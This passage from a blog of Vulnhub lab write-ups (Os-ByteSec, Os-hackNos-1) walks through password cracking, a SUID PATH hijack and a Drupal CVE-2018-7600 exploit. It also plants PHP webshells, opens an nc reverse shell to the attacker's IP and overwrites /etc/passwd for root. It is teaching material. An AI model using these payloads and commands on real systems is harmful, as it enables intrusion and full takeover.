class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PASSWORD FOUND!!!!: pw == hacker1</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The password is <code>hacker1</code></p><p>Extracting the archive gives secret.jpg and user.cap</p><p>The image yields nothing useful</p><p>user.cap is a Wi-Fi packet capture</p><p>Crack the password with <code>aircrack-ng</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> Aircrack-ng 1.6 </span><br><span class="line"></span><br><span class="line"> [00:00:00] 2354/10303727 keys tested (9801.73 k/s) </span><br><span class="line"></span><br><span class="line"> Time left: 17 minutes, 30 seconds 0.02%</span><br><span class="line"></span><br><span class="line"> KEY FOUND! 
[ snowflake ]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> Master Key : 88 D4 8C 29 79 BF DF 88 B4 14 0F 5A F3 E8 FB FB </span><br><span class="line"> 59 95 91 7F ED 3E 93 DB 2A C9 BA FB EE 07 EA 62 </span><br><span class="line"></span><br><span class="line"> Transient Key : 1F 89 42 F4 E2 74 8B 00 00 00 00 00 00 00 00 00 </span><br><span class="line"> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </span><br><span class="line"> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </span><br><span class="line"> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </span><br><span class="line"></span><br><span class="line"> EAPOL HMAC : ED B5 F7 D9 56 98 B0 5E 25 7D 86 08 C4 D4 02 3D </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The password is <code>snowflake</code></p><p>Log in via ssh; the earlier nmap scan showed ssh on port 2525, so add -p 2525</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─# ssh blackjax@192.168.5.135 -p 2525 </span><br></pre></td></tr></table></figure><p>Use <code>python3 -c 'import pty;pty.spawn("/bin/bash")'</code> to upgrade the shell</p><p>Get user.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">blackjax@nitin:~$ cat /home/blackjax/user.txt </span><br><span class="line"> _ _ _____ ______ _____ ______ _ _____ </span><br><span class="line"> | | | |/ ____| ____| __ \ | ____| | /\ / ____|</span><br><span class="line"> | | | | 
(___ | |__ | |__) |_____| |__ | | / \ | | __ </span><br><span class="line"> | | | |\___ \| __| | _ /______| __| | | / /\ \| | |_ |</span><br><span class="line"> | |__| |____) | |____| | \ \ | | | |____ / ____ \ |__| |</span><br><span class="line"> \____/|_____/|______|_| \_\ |_| |______/_/ \_\_____|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">Go To Root.</span><br><span class="line"></span><br><span class="line">MD5-HASH : f589a6959f3e04037eb2b3eb0ff726ac</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Try privilege escalation with sudo; after that fails, look for SUID binaries, i.e. commands that run with root privileges</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">blackjax@nitin:~$ sudo su root</span><br><span class="line">[sudo] password for blackjax: </span><br><span class="line">blackjax is not in the sudoers file. 
This incident will be reported.</span><br><span class="line">blackjax@nitin:~$ find / -perm -u=s -type f 2>/dev/null</span><br><span class="line">/usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">/usr/lib/openssh/ssh-keysign</span><br><span class="line">/usr/lib/policykit-1/polkit-agent-helper-1</span><br><span class="line">/usr/lib/snapd/snap-confine</span><br><span class="line">/usr/lib/i386-linux-gnu/lxc/lxc-user-nic</span><br><span class="line">/usr/lib/eject/dmcrypt-get-device</span><br><span class="line">/usr/bin/newgidmap</span><br><span class="line">/usr/bin/gpasswd</span><br><span class="line">/usr/bin/newuidmap</span><br><span class="line">/usr/bin/chfn</span><br><span class="line">/usr/bin/passwd</span><br><span class="line">/usr/bin/chsh</span><br><span class="line">/usr/bin/at</span><br><span class="line">/usr/bin/pkexec</span><br><span class="line">/usr/bin/newgrp</span><br><span class="line">/usr/bin/netscan</span><br><span class="line">/usr/bin/sudo</span><br><span class="line">/bin/ping6</span><br><span class="line">/bin/fusermount</span><br><span class="line">/bin/mount</span><br><span class="line">/bin/su</span><br><span class="line">/bin/ping</span><br><span class="line">/bin/umount</span><br><span class="line">/bin/ntfs-3g</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Running netscan shows output much like that of netstat -natp</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">blackjax@nitin:~$ netscan</span><br><span class="line">Active Internet connections (servers and 
established)</span><br><span class="line">Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name</span><br><span class="line">tcp 0 0 0.0.0.0:2525 0.0.0.0:* LISTEN 1153/sshd </span><br><span class="line">tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 1010/smbd </span><br><span class="line">tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 1181/mysqld </span><br><span class="line">tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 1010/smbd </span><br><span class="line">tcp 0 0 192.168.5.135:2525 192.168.5.129:54132 ESTABLISHED 3415/sshd: blackjax</span><br><span class="line">tcp6 0 0 :::2525 :::* LISTEN 1153/sshd </span><br><span class="line">tcp6 0 0 :::445 :::* LISTEN 1010/smbd </span><br><span class="line">tcp6 0 0 :::139 :::* LISTEN 1010/smbd </span><br><span class="line">tcp6 0 0 :::80 :::* LISTEN 1264/apache2 </span><br></pre></td></tr></table></figure><p>Inspecting the binary with <code>xxd /usr/bin/netscan</code> confirms that it does call netstat -natp.</p><p><img src="/2023/10/21/Os-ByteSec/image-20230628230353627.png" alt="image-20230628230353627"></p><p>So try to escalate privileges through this command; note that the file written here is named netstat, not netscan</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">blackjax@nitin:~$ cd /tmp</span><br><span class="line">blackjax@nitin:/tmp$ echo "/bin/bash" >netstat</span><br><span class="line">blackjax@nitin:/tmp$ chmod 775 netstat</span><br><span class="line">blackjax@nitin:/tmp$ export PATH=/tmp:$PATH</span><br><span class="line">blackjax@nitin:/tmp$ netscan</span><br><span class="line">root@nitin:/tmp# id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),1001(blackjax)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Finally, get root.txt</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">root@nitin:/tmp# cat /root/root.txt </span><br><span class="line"> ____ ____ ____ ______ ________ ___ ______</span><br><span class="line"> / __ \/ __ \/ __ \/_ __/ / ____/ / / | / ____/</span><br><span class="line"> / /_/ / / / / / / / / / / /_ / / / /| |/ / __ </span><br><span class="line"> / _, _/ /_/ / /_/ / / / / __/ / /___/ ___ / /_/ / </span><br><span class="line">/_/ |_|\____/\____/ /_/____/_/ /_____/_/ |_\____/ </span><br><span class="line"> /_____/ </span><br><span class="line">Conguratulation..</span><br><span class="line"></span><br><span class="line">MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author : Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">Contact : https://www.linkedin.com/in/rahulgehlaut/</span><br><span class="line"></span><br><span class="line">WebSite : jameshacker.me</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>Notes</h2><p>The command used for the privilege escalation is netscan, and the command that netscan calls is netstat, so netstat is the name used for the PATH hijack.</p>]]></content>
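The privilege escalation in the Os-ByteSec write-up above works because the SUID helper netscan runs netstat by bare name, so the program is resolved through the caller's PATH. As an added example, not part of the original write-up, the POSIX shell script below audits SUID binaries for exactly that pattern: it reads the printable strings of a binary, as `strings` or the write-up's `xxd` would show them, and flags any watched command referenced without an absolute path. The watch-list, the sample strings and the function names are my own constructions.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Audit helper for the PATH-hijack class shown above: a SUID program that
# shells out to "netstat -natp" lets any directory placed first in PATH
# supply a fake "netstat". The check flags watched command names that a
# binary references without a leading "/".

# Constructed watch-list of tools a privileged helper commonly shells out to.
WATCH_CMDS='netstat ss ps ls cat tar gzip sh bash'

# flag_relative_commands: read strings on stdin, print each one whose
# first word is a watched command given without an absolute path.
flag_relative_commands() {
    while IFS= read -r line; do
        first=${line%% *}          # first whitespace-separated word
        case "$first" in
            /*) continue ;;        # absolute path: not resolved via PATH
        esac
        for cmd in $WATCH_CMDS; do
            if [ "$first" = "$cmd" ]; then
                printf '%s\n' "$line"
                break
            fi
        done
    done
}

# audit_suid_file: apply the check to one real binary's printable strings.
audit_suid_file() {
    strings -- "$1" 2>/dev/null | flag_relative_commands
}

# audit_all_suid: the same find the write-up used (-u=s is -4000), then
# audit every hit. Run as root so every SUID binary is readable.
audit_all_suid() {
    find / -perm -4000 -type f 2>/dev/null | while IFS= read -r f; do
        hits=$(audit_suid_file "$f")
        if [ -n "$hits" ]; then
            printf '%s: %s\n' "$f" "$hits"
        fi
    done
}

# Constructed sample of what strings(1) returns for a helper like netscan,
# so the check can be exercised offline.
SAMPLE_STRINGS='/lib/ld-linux.so.2
libc.so.6
netstat -natp
/bin/ls -l /tmp
__libc_start_main'

# demo: run the check over the constructed sample; prints "netstat -natp".
demo() {
    printf '%s\n' "$SAMPLE_STRINGS" | flag_relative_commands
}

demo
```

The fix on the helper side is to invoke the tool by absolute path (execv of /bin/netstat, or at least a hard-coded PATH set before system()) and to ignore the caller's environment; sudo's secure_path setting exists for the same reason. Any SUID binary this audit reports deserves the same scrutiny the write-up gave netscan.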
<categories>
<category> Vulnhub </category>
</categories>
<tags>
<tag> Penetration testing </tag>
<tag> Privilege escalation </tag>
<tag> Linux </tag>
</tags>
</entry>
<entry>
<title>Os-hackNos-1</title>
<link href="/2023/10/21/Os-hackNos-1/"/>
<url>/2023/10/21/Os-hackNos-1/</url>
<content type="html"><![CDATA[<h1 id="Os-hackNos-1"><a href="#Os-hackNos-1" class="headerlink" title="Os-hackNos-1"></a>Os-hackNos-1</h1><p>Target machine download: <a href="https://www.vulnhub.com/entry/hacknos-os-hacknos,401">https://www.vulnhub.com/entry/hacknos-os-hacknos,401</a></p><p>The goal is the regular user's <strong>user.txt</strong> and the root user's <strong>root.txt</strong></p><h2 id="靶机配置"><a href="#靶机配置" class="headerlink" title="靶机配置"></a>Target setup</h2><p>The downloaded target file is Os-hackNos-1.ova</p><p>Open this ova file with VMware to import it. If, after the import, the machine cannot obtain an IP address, press Shift at the boot screen to enter the menu shown below, then press e</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231828025.png" alt="image-20230628231828025"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Scroll down and change ro to rw single init=/bin/bash</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231856200.png" alt="image-20230628231856200"></p><p>Then press Ctrl+X to enter the shell</p><p>Check the IP address with ip a</p><p>If there is no IP address, note the interface name; here it is ens33</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231909760.png" alt="image-20230628231909760"></p><p>Use</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/network/interfaces</span><br></pre></td></tr></table></figure><p>to edit the interface configuration</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231926804.png" alt="image-20230628231926804"></p><p>If vim /etc/network/interfaces does not show the information above, re-import the ova: delete this virtual machine, then open the ova with VMware again and import it.</p><p>Use</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/etc/init.d/networking restart</span><br></pre></td></tr></table></figure><p>to restart networking</p><p>If it reports that the networking command is not found, files were lost during the ova import and the ova must be imported again.</p><h2 id="进行渗透"><a href="#进行渗透" class="headerlink" title="进行渗透"></a>Penetration testing</h2><p>The target and Kali are on the same subnet.</p><p>Scan this subnet with nmap</p><p>nmap 
192.168.5.0/24 -O </p><p>The target's information is as follows </p><p>Nmap scan report for 192.168.5.132<br>Host is up (0.00047s latency).<br>Not shown: 998 closed ports<br>PORT STATE SERVICE<br>22/tcp open ssh<br>80/tcp open http<br>MAC Address: 00:0C:29:B0:11:06 (VMware)<br>Device type: general purpose<br>Running: Linux 3.X|4.X<br>OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4<br>OS details: Linux 3.2 - 4.9<br>Network Distance: 1 hop</p><p>Port 80 is open</p><p><strong>So the target IP address here is 192.168.5.132</strong></p><p>Since there is a web site, run a directory scan with dirsearch</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628231946258.png" alt="image-20230628231946258"></p><p>Found <a href="http://192.168.5.132/drupal/">http://192.168.5.132/drupal/</a> and visited it</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232004225.png" alt="image-20230628232004225"></p><p>From <a href="http://192.168.0.142/drupal/CHANGELOG.txt">http://192.168.0.142/drupal/CHANGELOG.txt</a> we learn that the Drupal version is Drupal 7.57</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232023925.png" alt="image-20230628232023925"></p><p>Searching Baidu and other search engines for vulnerabilities in this version turns up CVE-2018-7600</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232037744.png" alt="image-20230628232037744"></p><p>Download the exploit for this vulnerability from GitHub</p><p><a href="https://github.com/pimps/CVE-2018-7600">https://github.com/pimps/CVE-2018-7600</a></p><p>git clone <a href="https://github.com/pimps/CVE-2018-7600.git">https://github.com/pimps/CVE-2018-7600.git</a></p><p>On Kali</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c ls</span><br><span class="line"></span><br><span class="line">or</span><br><span class="line">python3 drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c 
ls</span><br></pre></td></tr></table></figure><p>即可执行ls读取文件</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232052599.png" alt="image-20230628232052599"></p><p>在当前目录写一个一句话木马</p><p>这里参考的moonsec的</p><p>moon.php</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php system($_POST['moon']);?></span><br></pre></td></tr></table></figure><p>这里写自己的webshell</p><p>php.php</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php @eval($_POST['qwer']);?></span><br></pre></td></tr></table></figure><p>后者可以通过菜刀之类的webshell工具进行连接</p><p>这里用哥斯拉进行连接</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232108952.png" alt="image-20230628232108952"></p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232130003.png" alt="image-20230628232130003"></p><p>或者采用第一种(即moon的方式)进行反弹shell</p><p>然后在当前目录开启python自带的httpserver</p><p>python -m SimpleHTTPServer</p><p>然后使用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c "wget http://192.168.5.129:8000/moon.php" </span><br></pre></td></tr></table></figure><p>将php文件上传到靶机上</p><p>再使用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c ls</span><br></pre></td></tr></table></figure><p>查看php木马是否上传成功</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232146849.png" alt="image-20230628232146849"></p><p>首先在kali中使用nc进行监听</p><p>nc -lvnp 9000</p><p>在浏览器中访问<a href="http://192.168.5.132/drupal/moon.php">http://192.168.5.132/drupal/moon.php</a></p><p>使用burp进行抓包准备反弹shell</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">POST /drupal/moon.php HTTP/1.1</span><br><span class="line"></span><br><span class="line">Host: 192.168.5.132</span><br><span class="line"></span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4482.0 Safari/537.36 Edg/92.0.874.0</span><br><span class="line"></span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span><br><span class="line"></span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"></span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line"></span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">Cookie: has_js=1</span><br><span class="line"></span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">Content-Length: 
91</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">moon=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash++2>%261|nc+192.168.5.129+9000+>/tmp/f</span><br></pre></td></tr></table></figure><p>注意这里的 192.168.5.129为kali的ip地址</p><p>moon博客里写的是/bin/sh -i 但是我在测试时报错了</p><p>rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+‐i+2>%261|nc+192.168.0.136+9001+>/tmp/f</p><p>我这里改为 /bin/bash</p><p>moon=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash++2>%261|nc+192.168.5.129+9000+>/tmp/f</p><p>提交之后可以反弹一个shell</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232204943.png" alt="image-20230628232204943"></p><p>此时已经反弹成功</p><p>然后切换为python3的shell</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c 'import pty;pty.spawn("/bin/bash")'</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232226022.png" alt="image-20230628232226022"></p><p>在网站根目录发现一个<strong>alexander.txt</strong></p><p>使用cat获取其内容</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">www-data@hackNos:/var/www/html/drupal$ cd ..</span><br><span class="line">cd ..</span><br><span class="line">www-data@hackNos:/var/www/html$ ls</span><br><span class="line">ls</span><br><span class="line">alexander.txt drupal index.html</span><br><span class="line">www-data@hackNos:/var/www/html$ cat alexander.txt</span><br><span class="line">cat alexander.txt</span><br><span 
class="line">KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>凭借经验看出这是base64加密的数据,将其使用base64解密</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232243956.png" alt="image-20230628232243956"></p><p>然后发现左边是Brainfuck</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232301143.png" alt="image-20230628232301143"></p><p>解密网站如下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.splitbrain.org/services/ook</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232314924.png" alt="image-20230628232314924"></p><p>点击右下角Brainfuck to text即可解密</p><p>得到james:hacker@4514</p><p>通过查找,在home中找到james和其目录下的user.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">www-data@hackNos:/home/james$ cat user.txt</span><br><span class="line">cat user.txt</span><br><span class="line"> _ </span><br><span class="line"> | | </span><br><span class="line"> / __) ______ _ _ ___ ___ _ __ </span><br><span class="line"> \__ \|______|| | | |/ __| / _ \| 
'__|</span><br><span class="line"> ( / | |_| |\__ \| __/| | </span><br><span class="line"> |_| \__,_||___/ \___||_| </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>试着提权,先看看suid提权,需要搜索到,带有s的文件,开始查找。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2>/dev/null</span><br></pre></td></tr></table></figure><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232332862.png" alt="image-20230628232332862"></p><p>发现wget普通用户也可执行</p><p>那么提权的方式就是通过下载目标靶机上的passwd,然后构造一个有root权限的用户加入到构造的passwd文件中,然后使用wget -O将内容重定向输入到/etc/passwd中</p><p>首先通过cat /etc/passwd获取靶机密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span 
class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">www-data@hackNos:/var/www/html/drupal$ cat /etc/passwd</span><br><span class="line">cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false</span><br><span class="line">systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false</span><br><span class="line">systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false</span><br><span 
class="line">systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false</span><br><span class="line">syslog:x:104:108::/home/syslog:/bin/false</span><br><span class="line">_apt:x:105:65534::/nonexistent:/bin/false</span><br><span class="line">lxd:x:106:65534::/var/lib/lxd/:/bin/false</span><br><span class="line">messagebus:x:107:111::/var/run/dbus:/bin/false</span><br><span class="line">uuidd:x:108:112::/run/uuidd:/bin/false</span><br><span class="line">dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false</span><br><span class="line">james:x:1000:1000:james,,,:/home/james:/bin/bash</span><br><span class="line">sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin</span><br><span class="line">mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">moon:$1$moon$8F2YI9c3zhkkS9SOsKawY0:0:0:root:/root:/bin/bash</span><br></pre></td></tr></table></figure><p>复制到本地生成文件passwd</p><p>在kali中生成密码</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232349133.png" alt="image-20230628232349133"></p><p>将moon加入到伪造的passwd,并赋予root权限</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232408828.png" alt="image-20230628232408828"></p><p>将passwd放到开启了python httpserver的文件夹中</p><p>然后使用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./drupa7-CVE-2018-7600.py http://192.168.5.132/drupal/ -c "wget http://192.168.5.129:8000/passwd -O /etc/passwd" </span><br></pre></td></tr></table></figure><p>或者直接在已有的shell中进行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget 